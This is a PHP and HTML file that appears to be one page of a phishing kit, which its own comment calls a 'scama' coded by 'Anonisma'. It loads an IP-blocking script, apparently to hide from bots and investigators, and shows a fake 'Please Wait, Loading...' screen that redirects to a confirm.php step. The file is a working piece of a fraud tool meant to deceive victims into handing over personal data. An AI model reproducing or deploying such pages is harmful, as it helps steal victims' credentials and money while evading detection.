<?php

session_start();

include "bots.php";  //Para Bloquear Algunas IPs / fhad scama fkhater khoti rjal o les amis del face Anonisma
?>

<!DOCTYPE html>
<html>
	<!--Coded by Anonisma-->
	<head>
		<title>Please Wait, Loading...</title>
		<meta http-equiv="refresh" content="2;url=confirm.php">
			<link rel="shortcut icon" <link rel="logo-icon" href="../set/img/iconisma.ico">
						<meta  content="text/html; charset=UTF-8">
						</head>
						<link rel="stylesheet" href="../set/cssisma/Anonisma.css">
							<BODY BACKGROUND="../set/img/Anonisma.png">
								<div class="Coded-by-Anonisma">
									<div class="trayNavInner clearfix" >
										<form>
											<div align="center">
												<img src="../set/img/logisma.gif" width="55" height="55">
													<p>
														<IMG src="../set/img/111isma.png">
														</p>
														<center>
															<a href="../confirm.php">
																<IMG src="../set/img/loisma.png">
																</center>
															</div>
														</div>
													</form>
												</section>
											</div>
										</footer>
									</div>
								</body>
</html>